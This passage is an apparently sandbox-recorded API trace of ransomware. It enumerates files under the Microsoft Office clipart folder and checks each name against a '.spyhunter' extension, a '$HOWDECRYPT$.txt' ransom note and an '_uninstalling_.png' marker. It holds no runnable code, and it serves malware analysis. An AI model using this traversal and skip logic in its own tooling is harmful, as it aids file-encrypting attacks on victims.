(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 67 [0098.412] GetProcessHeap () returned 0x2c0000 [0098.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c248a8 [0098.412] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2960) returned 0x2c249b0 [0098.412] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.412] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 67 [0098.412] StrStrIW (lpFirst="J0153089.WMF", lpSrch=".spyhunter") returned 0x0 [0098.412] lstrcmpW (lpString1="J0153089.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.413] lstrcmpW (lpString1="J0153089.WMF", lpString2="_uninstalling_.png") returned 1 [0098.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153089.WMF") returned 67 [0098.413] GetProcessHeap () returned 0x2c0000 [0098.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29a58 [0098.413] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2968) returned 0x2c249b0 [0098.413] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.413] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 67 [0098.413] StrStrIW (lpFirst="J0153091.WMF", lpSrch=".spyhunter") returned 0x0 [0098.413] lstrcmpW (lpString1="J0153091.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.413] lstrcmpW (lpString1="J0153091.WMF", lpString2="_uninstalling_.png") returned 1 [0098.413] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153091.WMF") returned 67 [0098.413] GetProcessHeap () returned 0x2c0000 [0098.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29b28 [0098.413] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2970) returned 0x2c249b0 [0098.413] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.413] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 67 [0098.413] StrStrIW (lpFirst="J0153093.WMF", lpSrch=".spyhunter") returned 0x0 [0098.413] lstrcmpW (lpString1="J0153093.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.413] lstrcmpW (lpString1="J0153093.WMF", lpString2="_uninstalling_.png") returned 1 [0098.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 67 [0098.414] GetProcessHeap () returned 0x2c0000 [0098.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29bf8 [0098.414] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2978) returned 0x2c249b0 [0098.414] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.414] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 67 [0098.414] StrStrIW (lpFirst="J0153095.WMF", lpSrch=".spyhunter") returned 0x0 [0098.414] lstrcmpW (lpString1="J0153095.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.414] lstrcmpW (lpString1="J0153095.WMF", lpString2="_uninstalling_.png") returned 1 [0098.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153095.WMF") returned 67 [0098.414] GetProcessHeap () returned 0x2c0000 [0098.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29cc8 [0098.414] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2980) returned 0x2c249b0 [0098.414] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.414] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 67 [0098.414] StrStrIW (lpFirst="J0153265.WMF", lpSrch=".spyhunter") returned 0x0 [0098.414] lstrcmpW (lpString1="J0153265.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.414] lstrcmpW (lpString1="J0153265.WMF", lpString2="_uninstalling_.png") returned 1 [0098.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153265.WMF") returned 67 [0098.415] GetProcessHeap () returned 0x2c0000 [0098.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29d98 [0098.415] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2988) returned 0x2c249b0 [0098.415] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.415] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 67 [0098.415] StrStrIW (lpFirst="J0153273.WMF", lpSrch=".spyhunter") returned 0x0 [0098.415] lstrcmpW (lpString1="J0153273.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.415] lstrcmpW (lpString1="J0153273.WMF", lpString2="_uninstalling_.png") returned 1 [0098.415] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153273.WMF") returned 67 [0098.415] GetProcessHeap () returned 0x2c0000 [0098.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29e68 [0098.415] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2990) returned 0x2c249b0 [0098.415] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.415] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 67 [0098.415] StrStrIW (lpFirst="J0153299.WMF", lpSrch=".spyhunter") returned 0x0 [0098.415] lstrcmpW (lpString1="J0153299.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.415] lstrcmpW (lpString1="J0153299.WMF", lpString2="_uninstalling_.png") returned 1 [0098.415] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 67 [0098.415] GetProcessHeap () returned 0x2c0000 [0098.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29f38 [0098.416] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2998) returned 0x2c249b0 [0098.416] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.416] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 67 [0098.416] StrStrIW (lpFirst="J0153302.WMF", lpSrch=".spyhunter") returned 0x0 [0098.416] lstrcmpW (lpString1="J0153302.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.416] lstrcmpW (lpString1="J0153302.WMF", lpString2="_uninstalling_.png") returned 1 [0098.416] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 67 [0098.416] GetProcessHeap () returned 0x2c0000 [0098.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a008 [0098.416] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29a0) returned 0x2c249b0 [0098.416] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.416] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 67 [0098.416] StrStrIW (lpFirst="J0153305.WMF", lpSrch=".spyhunter") returned 0x0 [0098.416] lstrcmpW (lpString1="J0153305.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.416] lstrcmpW (lpString1="J0153305.WMF", lpString2="_uninstalling_.png") returned 1 [0098.416] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153305.WMF") returned 67 [0098.416] GetProcessHeap () returned 0x2c0000 [0098.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a0d8 [0098.417] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29a8) returned 0x2c249b0 [0098.417] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.417] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 67 [0098.417] StrStrIW (lpFirst="J0153307.WMF", lpSrch=".spyhunter") returned 0x0 [0098.417] lstrcmpW (lpString1="J0153307.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.417] lstrcmpW (lpString1="J0153307.WMF", lpString2="_uninstalling_.png") returned 1 [0098.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 67 [0098.417] GetProcessHeap () returned 0x2c0000 [0098.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a1a8 [0098.417] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29b0) returned 0x2c249b0 [0098.417] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.417] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 67 [0098.417] StrStrIW (lpFirst="J0153313.WMF", lpSrch=".spyhunter") returned 0x0 [0098.417] lstrcmpW (lpString1="J0153313.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.417] lstrcmpW (lpString1="J0153313.WMF", lpString2="_uninstalling_.png") returned 1 [0098.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 67 [0098.417] GetProcessHeap () returned 0x2c0000 [0098.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a278 [0098.418] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29b8) returned 0x2c249b0 [0098.418] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.418] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 67 [0098.418] StrStrIW (lpFirst="J0153398.WMF", lpSrch=".spyhunter") returned 0x0 [0098.418] lstrcmpW (lpString1="J0153398.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.418] lstrcmpW (lpString1="J0153398.WMF", lpString2="_uninstalling_.png") returned 1 [0098.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153398.WMF") returned 67 [0098.418] GetProcessHeap () returned 0x2c0000 [0098.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a348 [0098.418] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29c0) returned 0x2c249b0 [0098.418] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.418] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 67 [0098.418] StrStrIW (lpFirst="J0153508.WMF", lpSrch=".spyhunter") returned 0x0 [0098.418] lstrcmpW (lpString1="J0153508.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.418] lstrcmpW (lpString1="J0153508.WMF", lpString2="_uninstalling_.png") returned 1 [0098.418] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153508.WMF") returned 67 [0098.418] GetProcessHeap () returned 0x2c0000 [0098.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a418 [0098.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29c8) returned 0x2c249b0 [0098.419] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.419] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 67 [0098.419] StrStrIW (lpFirst="J0153514.WMF", lpSrch=".spyhunter") returned 0x0 [0098.419] lstrcmpW (lpString1="J0153514.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.419] lstrcmpW (lpString1="J0153514.WMF", lpString2="_uninstalling_.png") returned 1 [0098.419] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153514.WMF") returned 67 [0098.419] GetProcessHeap () returned 0x2c0000 [0098.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a4e8 [0098.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29d0) returned 0x2c249b0 [0098.419] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.419] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 67 [0098.419] StrStrIW (lpFirst="J0153516.WMF", lpSrch=".spyhunter") returned 0x0 [0098.419] lstrcmpW (lpString1="J0153516.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.419] lstrcmpW (lpString1="J0153516.WMF", lpString2="_uninstalling_.png") returned 1 [0098.419] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153516.WMF") returned 67 [0098.419] GetProcessHeap () returned 0x2c0000 [0098.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a5b8 [0098.419] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29d8) returned 0x2c249b0 [0098.420] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.420] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 67 [0098.420] StrStrIW (lpFirst="J0153518.WMF", lpSrch=".spyhunter") returned 0x0 [0098.420] lstrcmpW (lpString1="J0153518.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.420] lstrcmpW (lpString1="J0153518.WMF", lpString2="_uninstalling_.png") returned 1 [0098.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 67 [0098.420] GetProcessHeap () returned 0x2c0000 [0098.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a688 [0098.420] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29e0) returned 0x2c249b0 [0098.420] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.420] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 67 [0098.420] StrStrIW (lpFirst="J0156537.WMF", lpSrch=".spyhunter") returned 0x0 [0098.420] lstrcmpW (lpString1="J0156537.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.420] lstrcmpW (lpString1="J0156537.WMF", lpString2="_uninstalling_.png") returned 1 [0098.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 67 [0098.420] GetProcessHeap () returned 0x2c0000 [0098.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a758 [0098.420] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29e8) returned 0x2c249b0 [0098.421] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.421] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 67 [0098.421] StrStrIW (lpFirst="J0157167.WMF", lpSrch=".spyhunter") returned 0x0 [0098.421] lstrcmpW (lpString1="J0157167.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.421] lstrcmpW (lpString1="J0157167.WMF", lpString2="_uninstalling_.png") returned 1 [0098.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 67 [0098.421] GetProcessHeap () returned 0x2c0000 [0098.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a828 [0098.421] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29f0) returned 0x2c249b0 [0098.421] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.421] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 67 [0098.421] StrStrIW (lpFirst="J0157177.WMF", lpSrch=".spyhunter") returned 0x0 [0098.421] lstrcmpW (lpString1="J0157177.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.421] lstrcmpW (lpString1="J0157177.WMF", lpString2="_uninstalling_.png") returned 1 [0098.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned 67 [0098.421] GetProcessHeap () returned 0x2c0000 [0098.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a8f8 [0098.421] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x29f8) returned 0x2c249b0 [0098.421] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.422] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 67 [0098.422] StrStrIW (lpFirst="J0157191.WMF", lpSrch=".spyhunter") returned 0x0 [0098.422] lstrcmpW (lpString1="J0157191.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.422] lstrcmpW (lpString1="J0157191.WMF", lpString2="_uninstalling_.png") returned 1 [0098.422] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 67 [0098.422] GetProcessHeap () returned 0x2c0000 [0098.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2a9c8 [0098.422] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a00) returned 0x2c249b0 [0098.422] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.422] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 67 [0098.422] StrStrIW (lpFirst="J0157831.WMF", lpSrch=".spyhunter") returned 0x0 [0098.422] lstrcmpW (lpString1="J0157831.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.422] lstrcmpW (lpString1="J0157831.WMF", lpString2="_uninstalling_.png") returned 1 [0098.422] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 67 [0098.422] GetProcessHeap () returned 0x2c0000 [0098.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2aa98 [0098.422] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a08) returned 0x2c249b0 [0098.422] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.422] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 67 [0098.423] StrStrIW (lpFirst="J0158071.WMF", lpSrch=".spyhunter") returned 0x0 [0098.423] lstrcmpW (lpString1="J0158071.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.423] lstrcmpW (lpString1="J0158071.WMF", lpString2="_uninstalling_.png") returned 1 [0098.423] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 67 [0098.423] GetProcessHeap () returned 0x2c0000 [0098.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ab68 [0098.423] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a10) returned 0x2c249b0 [0098.423] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.423] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 67 [0098.423] StrStrIW (lpFirst="J0158477.WMF", lpSrch=".spyhunter") returned 0x0 [0098.423] lstrcmpW (lpString1="J0158477.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.423] lstrcmpW (lpString1="J0158477.WMF", lpString2="_uninstalling_.png") returned 1 [0098.423] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158477.WMF") returned 67 [0098.423] GetProcessHeap () returned 0x2c0000 [0098.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ac38 [0098.423] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a18) returned 0x2c249b0 [0098.423] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.430] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 67 [0098.430] StrStrIW (lpFirst="J0160590.WMF", lpSrch=".spyhunter") returned 0x0 [0098.430] lstrcmpW (lpString1="J0160590.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.430] lstrcmpW (lpString1="J0160590.WMF", lpString2="_uninstalling_.png") returned 1 [0098.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 67 [0098.430] GetProcessHeap () returned 0x2c0000 [0098.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c289c8 [0098.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a18) returned 0x2c249b0 [0098.431] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.431] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 67 [0098.431] StrStrIW (lpFirst="J0164153.JPG", lpSrch=".spyhunter") returned 0x0 [0098.431] lstrcmpW (lpString1="J0164153.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.431] lstrcmpW (lpString1="J0164153.JPG", lpString2="_uninstalling_.png") returned 1 [0098.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0164153.JPG") returned 67 [0098.431] GetProcessHeap () returned 0x2c0000 [0098.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ad08 [0098.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a20) returned 0x2c249b0 [0098.431] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.431] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 67 [0098.431] StrStrIW (lpFirst="J0168644.WMF", lpSrch=".spyhunter") returned 0x0 [0098.431] lstrcmpW (lpString1="J0168644.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.431] lstrcmpW (lpString1="J0168644.WMF", lpString2="_uninstalling_.png") returned 1 [0098.431] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 67 [0098.431] GetProcessHeap () returned 0x2c0000 [0098.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2add8 [0098.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a28) returned 0x2c249b0 [0098.432] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.432] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 67 [0098.432] StrStrIW (lpFirst="J0171685.WMF", lpSrch=".spyhunter") returned 0x0 [0098.432] lstrcmpW (lpString1="J0171685.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.432] lstrcmpW (lpString1="J0171685.WMF", lpString2="_uninstalling_.png") returned 1 [0098.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171685.WMF") returned 67 [0098.432] GetProcessHeap () returned 0x2c0000 